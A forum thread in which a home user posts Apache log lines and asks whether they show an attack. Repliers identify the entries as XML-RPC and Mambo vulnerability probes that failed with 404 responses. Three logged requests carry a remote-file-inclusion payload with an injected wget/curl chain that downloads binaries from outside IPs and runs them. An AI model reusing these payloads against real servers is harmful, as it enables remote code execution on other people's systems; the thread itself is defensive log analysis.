Want to protect your cyber security and still get fast solutions? Ask a secure question today.Go Premium

x
  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 431
  • Last Modified:

My WebServer Logs - Is this an attack?

Hi, I found wome weird entries on my webserver access logs.  My webserver could only have been found by port scanning - it is running on my home PC and I use dynamic dns to locate it.  It is basically just used by friends and family in other states to view pictures of my new baby son.

I found the following in my access log, all from an IP address in Japan, and I think it looks like someone trying to find a vulnerability in my webserver - I have obliterated part of the IP address in the extract below.

NOTE: All of the resources being requested do not exist on my site - I do not have anything like blog/ or blogs/ or any of the stuff being requested.  It looks to me like someone is fishing around for some known vulnerabilities (and not finding any I hope).

I'd appreciate any advice on what you think the logs indicate...  Is this an attack or something innocent?

I'm running apache2.


218.44.74.### - - [06/Apr/2006:14:06:12 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:13 +1000] "POST /blog/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:14 +1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:16 +1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:17 +1000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:19 +1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:20 +1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:21 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:23 +1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:24 +1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:25 +1000] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo|  HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:27 +1000] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo|  HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:28 +1000] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo|  HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

0
basicinstinct
Asked:
basicinstinct
1 Solution
 
jss1199Commented:
Hi basicinstinct,

You hit the nail on the head....They are fishing for to exploit xml-rpc for php vulnerability

http://isc.sans.org/diary.php?storyid=823


Cheers!
0
 
jhanceCommented:
It's not a problem, however.  Note that all the responses are "404".  That means what was sought was not found.  If this were my server I'd simply put a block on this IP address to prevent further attempts.  You could try reporting this to the ISP that handles this IP but in most cases such requests get ignored.
0
 
basicinstinctAuthor Commented:
Thanks for the response - the link to isc.sans.org from jss is very informative.  Thanks also to jhance - I had not noticed the responses were all 404 - that's a relief.  I will indeed block this IP - good idea.

I put the IP address of the attacker into a web browser and it came up with a legitimate website - some open source software developer company thingy.  

Either the attacker originates from there, or I suppose it is more likely that the attacker has already compromised that webserver and is using it to relay attacks.

Either way, I intend to contact this website and ask the to PLEASE EXPLAIN.  I will also write to the ISP.  It is really disappointing - all I want to do is let dear old granny see pictures and videos of her new grandson, and someone out there tries to destroy this without giving it a second thought.  Perhaps they think it makes them some sort of "l33t hacker" or something equally as silly, but they are just scriptkiddies, following the steps that someone else worked out for them.  I'm upset, but I'll stop raving now.

0

Featured Post

Who's Defending Your Organization from Threats?

Protecting against advanced threats requires an IT dream team – a well-oiled machine of people and solutions working together to defend your organization. Download our resource kit today to learn more about the tools you need to build you IT Dream Team!

Tackle projects and never again get stuck behind a technical roadblock.
Join Now